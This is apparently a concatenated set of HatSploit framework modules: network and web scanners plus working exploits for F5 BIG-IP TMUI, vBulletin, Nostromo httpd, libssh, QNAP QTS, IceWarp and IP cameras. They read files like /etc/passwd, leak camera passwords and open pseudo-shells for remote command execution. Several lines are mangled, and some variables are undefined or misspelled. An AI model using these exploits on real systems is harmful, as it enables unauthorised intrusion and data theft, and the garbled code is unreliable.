def __init__(self): self.sessions = sessions() self.local_storage = local_storage() self.badges = badges() self.tcp = tcp() self.http = http() self.servers = dict()
class HatSploitModule(HatSploitModule): types = types() tcp = tcp() http = http() details = { 'Name': "Port Scanner", 'Module': "auxiliary/multi/scanner/port_scanner", 'Authors': [ 'enty8080' ], 'Description': "Scan host for opened ports.", 'Dependencies': [ '' ], 'Comments': [ '' ], 'Risk': "low" } options = { 'RHOST': { 'Description': "Remote host.", 'Value': None, 'Type': "ip", 'Required': True }, 'RANGE': { 'Description': "Ports to scan.", 'Value': "0-65535", 'Type': "port_range", 'Required': True }, 'TIMEOUT': { 'Description': "Timeout for scan.", 'Value': 0.5, 'Type': "number", 'Required': True } } def run(self): remote_host, ports_range, timeout = self.parser.parse_options(self.options) start = int(ports_range.split('-')[0].strip()) end = int(ports_range.split('-')[1].strip()) self.badges.output_process("Scanning " + remote_host + "...") for port in range(start, end): target = self.http.format_host_and_port(remote_host, port) if self.tcp.check_tcp_port(remote_host, port, float(timeout)): self.badges.output_success(target + " - opened")
class HatSploitModule(HatSploitModule): config = config() http = http() details = { 'Name': "Directory Scanner", 'Module': "auxiliary/multi/scanner/directory_scanner", 'Authors': ['enty8080'], 'Description': "Website directory scanner.", 'Dependencies': [''], 'Comments': [''], 'Risk': "medium" } options = { 'URL': { 'Description': "Target URL.", 'Value': None, 'Type': None, 'Required': True } } def run(self): target_url = self.parser.parse_options(self.options) self.badges.output_process("Scanning " + target_url + "...") if not self.http.check_url_access(target_url): self.badges.output_error("Failed to scan!") return file = open( self.config.path_config['base_paths']['data_path'] + 'modules/auxiliary/multi/scanner/directory_scanner/directories.txt' ) directories = list(filter(None,'\n'))) file.close() for path in directories: response = self.http.http_request(method="HEAD", url=target_url, path=path) if response.status_code == 200: self.badges.output_success( "[%s] ... [%s %s]" % (path, response.status_code, response.reason)) else: self.badges.output_warning( "[%s] ... [%s %s]" % (path, response.status_code, response.reason))
class HatSploitModule(HatSploitModule): http = http() dictionary = dictionary() paths = dictionary.paths details = { 'Name': "Apache Users Scanner", 'Module': "auxiliary/multi/scanner/apache_users", 'Authors': ['enty8080'], 'Description': "Scan website apache users.", 'Dependencies': [''], 'Comments': [''], 'Risk': "medium" } options = { 'URL': { 'Description': "Target URL address.", 'Value': None, 'Type': None, 'Required': True } } def run(self): target_url = self.parser.parse_options(self.options) self.badges.output_process("Scanning " + target_url + "...") if not self.http.check_url_access(target_url): self.badges.output_error("Failed to scan!") return for path in self.paths: path = path.replace("\n", "") response = self.http.http_request(method="HEAD", url=target_url, path=path) if response.status_code == 200: self.badges.output_success( "[%s] ... [%s %s]" % (path, response.status_code, response.reason)) else: self.badges.output_warning( "[%s] ... [%s %s]" % (path, response.status_code, response.reason))
class HatSploitModule(HatSploitModule): tcp = tcp() http = http() details = { 'Name': "F5 Big-IP TMUI Local File Inclusion", 'Module': "exploit/multi/f5_big_ip_tmui/local_file_inclusion", 'Authors': ['enty8080'], 'Description': "Local File Inclusion in F5 BIG-IP Traffic Management User Interface (TMUI).", 'Dependencies': [''], 'Comments': [''], 'Risk': "high" } options = { 'RHOST': { 'Description': "Remote host.", 'Value': None, 'Type': "ip", 'Required': True }, 'RPORT': { 'Description': "Remote port.", 'Value': 443, 'Type': "port", 'Required': True }, 'RFILE': { 'Description': "Remote file to read.", 'Value': "/etc/passwd", 'Type': None, 'Required': True } } def generate_payload(self, remote_file): self.badges.output_process("Generating payload...") payload = f"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName={remote_file}" return payload def send_payload(self, target_url, payload): self.badges.output_process("Sending payload...") response = self.http.http_request("GET", target_url, payload) if response.status_code != 200: self.badges.output_error("Failed to send payload!") return None return response def run(self): remote_host, remote_port, remote_file = self.parser.parse_options( self.options) target = self.http.format_host_and_port(remote_host, remote_port) self.badges.output_process("Exploiting " + target + "...") target_url = self.http.craft_url(remote_host, remote_port) if not self.http.check_url_access(target_url): self.badges.output_error("Exploit failed!") return payload = self.generate_payload(remote_file) response = self.send_payload(target_url, payload) if not response: self.badges.output_error("Exploit failed!") return self.badges.output_process("Attempting to read file...") remote_file_output = response.json()["output"].strip() if remote_file_output: self.badges.output_empty(remote_file_output) else: self.badges.output_warning("File is empty.")
class HatSploitModule(HatSploitModule): http = http() string = string() details = { 'Name': "CCTV GoAhead Camera Password Disclosure", 'Module': "exploit/multi/cctv_goahead_camera/password_disclosure", 'Authors': ['enty8080'], 'Description': "CCTV GoAhead Camera password disclosure exploit.", 'Dependencies': [''], 'Comments': [''], 'Risk': "high" } options = { 'RHOST': { 'Description': "Remote host.", 'Value': None, 'Type': "ip", 'Required': True }, 'RPORT': { 'Description': "Remote port.", 'Value': 81, 'Type': "port", 'Required': True }, 'USERNAME': { 'Description': "Default username.", 'Value': "admin", 'Type': None, 'Required': True } } def exploit(self, remote_host, remote_port, username): target_url = self.http.craft_url(remote_host, remote_port) if not self.http.check_url_access(target_url): self.badges.output_error("Exploit failed!") return self.badges.output_process("Generating payload...") payload = '/system.ini?loginuse&loginpas' self.badges.output_process("Sending payload...") response = self.http.http_request("GET", target_url, payload) if response.status_code != 200: self.badges.output_error("Failed to send payload!") self.badges.output_error("Exploit failed!") return gathered_data = response.text strings = self.string.extract_strings(gathered_data) if username in strings: username_index = strings.index(username) password_index = username_index + 1 self.badges.output_information("Username: "******"Password: "******"Target vulnerable, but default username in not " + username + "!") def run(self): remote_host, remote_port, username = self.parser.parse_options( self.options) target = self.http.format_host_and_port(remote_host, remote_port) self.badges.output_process("Exploiting " + target + "...") self.exploit(remote_host, remote_port, username)
class HatSploitModule(HatSploitModule): tcp = tcp() pseudo_shell = pseudo_shell() http = http() details = { 'Name': "vBulletin Widget PHP Template Code Execution", 'Module': "exploit/multi/vbulletin_widget_php/template_code_execution", 'Authors': ['enty8080'], 'Description': "vBulletin 5.5.4 till 5.6.2 widget_php widget_tabbedcontainer_tab_panel Remote Code Execution.", 'Dependencies': [''], 'Comments': [''], 'Risk': "high" } options = { 'RHOST': { 'Description': "Remote host.", 'Value': None, 'Type': "ip", 'Required': True }, 'RPORT': { 'Description': "Remote port.", 'Value': None, 'Type': "port", 'Required': True }, 'PHP_METHOD': { 'Description': "PHP method to execute command.", 'Value': "shell_exec", 'Type': None, 'Required': True }, 'INSTALL_URL': { 'Description': "URL to vBulletin installation.", 'Value': "/", 'Type': None, 'Required': True }, 'COMMAND': { 'Description': "Command to execute.", 'Value': "uname -a", 'Type': None, 'Required': True }, 'PSEUDO': { 'Description': "Spawn Pseudo shell.", 'Value': "no", 'Required': False } } def generate_payload(self, target_url, installation_path, php_method, command): self.badges.output_process("Generating payload...") payload = { 'subWidgets[0][template]': 'widget_php', 'subWidgets[0][config][code]': f"echo {php_method}('{command}'); exit;" } new_url = f"{target_url}/{installation_path}/ajax/render/widget_tabbedcontainer_tab_panel" return (new_url, payload) def send_payload(self, target_url, payload): self.badges.output_process("Sending payload...") response = self.http.send_post_to_url(target_url, payload) if response.status_code != 200: self.badges.output_error("Failed to send payload!") return None return response def execute_command(self, target_url, installation_path, php_method, command): new_url, payload = self.generate_payload(target_url, installation_path, php_method, command) response = self.send_payload(new_url, payload) if not response: return (False, "") self.badges.output_process("Attempting to execute command...") command_output = (response.text).strip() return (True, command_output) def run(self): remote_host, remote_port, php_method, installation_path, command, pseudo = self.parser.parse_options( self.options) target = self.http.format_host_and_port(remote_host, remote_port) self.badges.output_process("Exploiting " + target + "...") target_url = self.http.craft_url(remote_host, remote_port) if self.http.check_url_access(target_url): self.badges.output_error("Exploit failed!") return arguments = (target_url, installation_path, php_method) if pseudo in ['yes', 'y']: self.pseudo_shell.spawn_pseudo_shell(self.details['Module'], self.execute_command, arguments) else: self.pseudo_shell.execute_command(self.execute_command, command, arguments)
class HatSploitModule(HatSploitModule): pseudo_shell = pseudo_shell() http = http() details = { 'Name': "Nostromo Httpd Remote Code Execution", 'Module': "exploit/multi/nostromo_httpd/remote_code_execution", 'Authors': ['enty8080'], 'Description': "Remote Code Execution in Nostromo Httpd.", 'Dependencies': [''], 'Comments': [''], 'Risk': "high" } options = { 'RHOST': { 'Description': "Remote host.", 'Value': None, 'Type': "ip", 'Required': True }, 'RPORT': { 'Description': "Remote port.", 'Value': 80, 'Type': "port", 'Required': True }, 'COMMAND': { 'Description': "Command to execute", 'Value': "whoami", 'Type': None, 'Required': True }, 'PSEUDO': { 'Description': "Spawn Pseudo shell.", 'Value': "no", 'Type': "boolean", 'Required': False } } def format_response(self, response): response = response.split('\r\n\r\n', 1) if len(response) == 2: return response[1].strip() return None def execute_command(self, target_url, command): self.badges.output_process("Generating payload...") path = '/.%0d./.%0d./.%0d./.%0d./bin/sh' data = f'echo\necho\n{command} 2>&1' self.badges.output_process("Sending payload...") response = self.http.http_request("POST", target_url, path, data) self.badges.output_process("Attempting to execute command...") response = self.format_response(response) return (True, response) def check_vulnerable(self, target_url): if self.http.check_url_access(target_url): headers = self.http.http_request("HEAD", target_url, "/").headers if 'Server' in headers.keys(): server = headers['Server'] if int(server.split('.')[-1]) < 7: return True return False def run(self): remote_host, remote_port, command, pseudo = self.parser.parse_options( self.options) target = self.http.format_host_and_port(remote_host, remote_port) self.badges.output_process("Exploiting " + target + "...") target_url = self.http.craft_url(remote_host, remote_port) if not self.check_vulnerable(target_url): self.badges.output_error("Exploit failed!") return arguments = (target_url) if pseudo in ['yes', 'y']: self.pseudo_shell.spawn_pseudo_shell(self.details['Module'], self.execute_command, arguments) else: self.pseudo_shell.execute_command(self.execute_command, command, arguments)
class HatSploitModule(HatSploitModule): http = http() details = { 'Name': "IceWarp WebMail Local File Inclusion", 'Module': "exploit/multi/icewarp_webmail/local_file_inclusion", 'Authors': ['enty8080'], 'Description': "Local File Inclusion in IceWarp <= 10.4.4 WebMail.", 'Dependencies': [''], 'Comments': [''], 'Risk': "high" } options = { 'RHOST': { 'Description': "Remote host.", 'Value': None, 'Type': "ip", 'Required': True }, 'RPORT': { 'Description': "Remote port.", 'Value': 80, 'Type': "port", 'Required': True }, 'RFILE': { 'Description': "Remote file to read.", 'Value': "minimizer/index.php", 'Type': None, 'Required': True } } def read_remote_file(self, target_url, remote_file): self.badges.output_process("Generating payload...") payload = f"/webmail/calendar/minimizer/index.php?style=../../../../../../../../{remote_file}" self.badges.output_process("Sending payload...") response = self.http.http_request("GET", target_url, payload) if response.status_code != 200: self.badges.output_error("Failed to send payload!") return self.badges.output_process("Attempting to read file...") remote_file_output = response.text.strip() if remote_file_output: self.badges.output_information("Remote file output:") self.badges.output_empty(remote_file_output) else: self.badges.output_warning("File is empty.") def check_vulnerable(self, target_url): if self.http.check_url_access(target_url): headers = self.http.http_request("HEAD", target_url, "/").headers if 'Server' in headers.keys(): banner = headers['Server'] if banner: if int(banner.split('/')[1].split('.')[-1]) < 4: return True return False def run(self): remote_host, remote_port, remote_file = self.parser.parse_options( self.options) target = self.http.format_host_and_port(remote_host, remote_port) self.badges.output_process("Exploiting " + target + "...") target_url = self.http.craft_url(remote_host, remote_port) if not self.check_vulnerable(target_url): self.badges.output_error("Exploit failed!") return self.read_remote_file(target_url, remote_file)
class HatSploitModule(HatSploitModule): pseudo_shell = pseudo_shell() http = http() buffer_size = 2048 client = None details = { 'Name': "SSH LibSSH Code Execution", 'Module': "exploit/multi/ssh/libssh_code_execution", 'Authors': ['enty8080'], 'Description': "SSH LibSSH unauthorized access Remote Code Execution.", 'Dependencies': ['paramiko'], 'Comments': [''], 'Risk': "medium" } options = { 'RHOST': { 'Description': "Remote host.", 'Value': None, 'Type': "ip", 'Required': True }, 'RPORT': { 'Description': "Remote port.", 'Value': 2222, 'Type': "port", 'Required': True }, 'COMMAND': { 'Description': "Command to execute", 'Value': "whoami", 'Type': None, 'Required': True }, 'PSEUDO': { 'Description': "Spawn Pseudo shell.", 'Value': "no", 'Type': "boolean", 'Required': False } } def execute_command(self, target_host, target_port, command): self.badges.output_process("Attempting to execute command...") try: self.connect(target_host, target_port) self.client.exec_command(command) stdout = self.client.makefile("rb", self.buffer_size) output = stdout.close() return (True, output) except Exception: return (False, "") def obtain_banner(self, remote_host, remote_port): try: sock = socket.create_connection((remote_host, int(remote_port))) sock.settimeout(5) banner = sock.recv(self.buffer_size) sock.close() return banner.split(b'\n')[0].decode().strip() except Exception: return None def check_vulnerable(self, remote_host, remote_port): banner = self.obtain_banner(remote_host, remote_port) if banner: if any(version in banner for version in ['libssh-0.6', 'libssh_0.6']): return True if any(version in banner for version in ['libssh-0.7', 'libssh_0.7']): if int(banner.split('.')[-1]) < 6: return True if any(version in banner for version in ['libssh-0.8', 'libssh_0.8']): if int(banner.split('.')[-1]) < 4: return True return False def connect(self, remote_host, remote_port): sock = socket.socket() sock.connect((remote_host, int(remote_port))) message = paramiko.message.Message() transport = paramiko.transport.Transport(sock) transport.start_client() message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS) transport._send_message(message) self.client = transport.open_session(timeout=5) def run(self): remote_host, remote_port, command, pseudo = self.parser.parse_options( self.options) target = self.http.format_host_and_port(remote_host, remote_port) self.badges.output_process("Exploiting " + target + "...") if not self.check_vulnerable(remote_host, remote_port): self.badges.output_error("Failed to exploit!") return arguments = (remote_host, remote_port) if pseudo in ['yes', 'y']: self.pseudo_shell.spawn_pseudo_shell(self.details['Module'], self.execute_command, arguments) else: self.pseudo_shell.execute_command(self.execute_command, command, arguments)
class HatSploitModule(HatSploitModule): http = http() details = { 'Name': "QNAP QTS Local File Inclusion", 'Module': "exploit/multi/qnap_qts/local_file_inclusion", 'Authors': ['enty8080'], 'Description': "QNAP QTS and Photo Station 6.0.3 Local File Inclusion.", 'Dependencies': [''], 'Comments': [''], 'Risk': "high" } options = { 'RHOST': { 'Description': "Remote host.", 'Value': None, 'Type': "ip", 'Required': True }, 'RPORT': { 'Description': "Remote port.", 'Value': None, 'Type': "port", 'Required': True }, 'RFILE': { 'Description': "Remote file to read.", 'Value': "/etc/passwd", 'Type': None, 'Required': True } } def read_remote_file(self, target_url, album_code, slideshow_code, remote_file): self.badges.output_process("Generating payload...") post_data = { 'album': album_code, 'a': 'caption', 'ac': slideslow_code, 'f': 'UMGObv', 'filename': remote_file } self.badges.output_process("Sending payload...") file_read_response = self.http.http_request("POST", target_url, "/photo/p/api/video.php", post_data) if file_read_response.status_code != 200: self.badges.output_error("Failed to send payload!") return self.badges.output_process("Attempting to read file...") remote_file_output = file_read_response.text.strip() if remote_file_output: self.badges.output_information("Remote file output:") self.badges.output_empty(remote_file_output) else: self.badges.output_warning("File is empty.") def exploit(self, remote_host, remote_port, remote_file): target_url = self.http.craft_url(remote_host, remote_port) if not self.http.check_url_access(target_url): self.badges.output_error("Exploit failed!") return self.badges.output_process("Searching for album code...") post_data = {'a': 'setSlideshow', 'f': 'qsamplealbum'} album_code_response = self.http.http_request("POST", target_url, "/photo/p/api/album.php", post_data) if album_code_response.status_code != 200: self.badges.output_error("Failed to obtain album code!") return album_code ='(?<=<output>).*?(?=</output>)', album_code_response.text).group() self.badges.output_information("Album code: " + album_code) self.badges.output_process("Searching for slideshow code...") slideslow_code_response = self.http.http_request( "GET", target_url, f"/photo/slideshow.php?album={album_code}") if slideslow_response.status_code != 200: self.badges.output_error("Failed to obtain slideslow code!") return slideslow_code ="(?<=encodeURIComponent\\(').*?(?=')", slideslow_code_response.text).group() self.badges.output_information("Slideslow code: " + slideslow_code) self.read_remote_file(target_url, album_code, slideslow_code, remote_file) def run(self): remote_host, remote_port, remote_file = self.parser.parse_options( self.options) target = self.http.format_host_and_port(remote_host, remote_port) self.badges.output_process("Exploiting " + target + "...") self.exploit(remote_host, remote_port, remote_file)
class HatSploitModule(HatSploitModule): tcp = tcp() pseudo_shell = pseudo_shell() http = http() details = { 'Name': "F5 Big-IP TMUI Remote Code Execution", 'Module': "exploit/multi/f5_big_ip_tmui/remote_code_execution", 'Authors': ['enty8080'], 'Description': "Remote Code Execution in F5 BIG-IP Traffic Management User Interface (TMUI).", 'Dependencies': ['requests'], 'Comments': [''], 'Risk': "high" } options = { 'RHOST': { 'Description': "Remote host.", 'Value': None, 'Type': "ip", 'Required': True }, 'RPORT': { 'Description': "Remote port.", 'Value': None, 'Type': "port", 'Required': True }, 'COMMAND': { 'Description': "Command to execute.", 'Value': "whoami", 'Type': None, 'Required': True }, 'PSEUDO': { 'Description': "Spawn Pseudo shell.", 'Value': "no", 'Type': "boolean", 'Required': False } } def generate_payload(self, command): self.badges.output_process("Generating payload...") payload = f"/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command={command}" return payload def send_payload(self, target_url, payload): self.badges.output_process("Sending payload...") response = self.http.http_request("GET", target_url, payload) if response.status_code != 200: self.badges.output_error("Failed to send payload!") return None return response def execute_command(self, target_url, command): payload = self.generate_payload(command) response = self.send_payload(target_url, payload) if not response: return (False, "") self.badges.output_process("Attempting to execute command...") error_output = response.json()["error"].strip() command_output = response.json()["output"].strip() if not error: return (True, command_output) return (False, "") def run(self): remote_host, remote_port, command, pseudo = self.parser.parse_options( self.options) target = self.http.format_host_and_port(remote_host, remote_port) self.badges.output_process("Exploiting " + target + "...") target_url = self.http.craft_url(remote_host, remote_port) if not self.http.check_url_access(target_url): self.badges.output_error("Exploit failed!") return payload = self.generate_payload(command) response = self.send_payload(target_url, payload) if not response: self.badges.output_error("Exploit failed!") return arguments = (target_url) if pseudo in ['yes', 'y']: self.pseudo_shell.spawn_pseudo_shell(self.details['Module'], self.execute_command, arguments) else: self.pseudo_shell.execute_command(self.execute_command, command, arguments)
class HatSploitModule(HatSploitModule): http = http() string = string() details = { 'Name': "Netwave IP Camera Information Disclosure", 'Module': "exploit/multi/netwave_ip_camera/information_disclosure", 'Authors': ['enty8080'], 'Description': "Netwave IP Camera information disclosure exploit.", 'Dependencies': [''], 'Comments': [''], 'Risk': "high" } options = { 'RHOST': { 'Description': "Remote host.", 'Value': None, 'Type': "ip", 'Required': True }, 'RPORT': { 'Description': "Remote port.", 'Value': 81, 'Type': "port", 'Required': True } } def print_formatted_data(self, data): data = data.replace(';', '') data = data.replace('=', ': ') data = data.replace('var', '=>') data = data.replace("'", '') data = data.split('\n') for data_type in data: self.badges.output_information(data_type) def exploit(self, remote_host, remote_port): target_url = self.http.craft_url(remote_host, remote_port) if not self.http.check_url_access(target_url): self.badges.output_error("Exploit failed!") return self.badges.output_process("Searching for information leak...") payload = '/get_status.cgi' response = self.http.http_request("GET", target_url, payload) if response.status_code != 200: self.badges.output_error("No information leak found!") self.badges.output_error("Exploit failed!") return self.badges.output_success("Found leaked system information!") self.badges.output_information("Leaked system information:") self.print_formatted_data(response.text.strip()) def run(self): remote_host, remote_port = self.parser.parse_options(self.options) target = self.http.format_host_and_port(remote_host, remote_port) self.badges.output_process("Exploiting " + target + "...") self.exploit(remote_host, remote_port)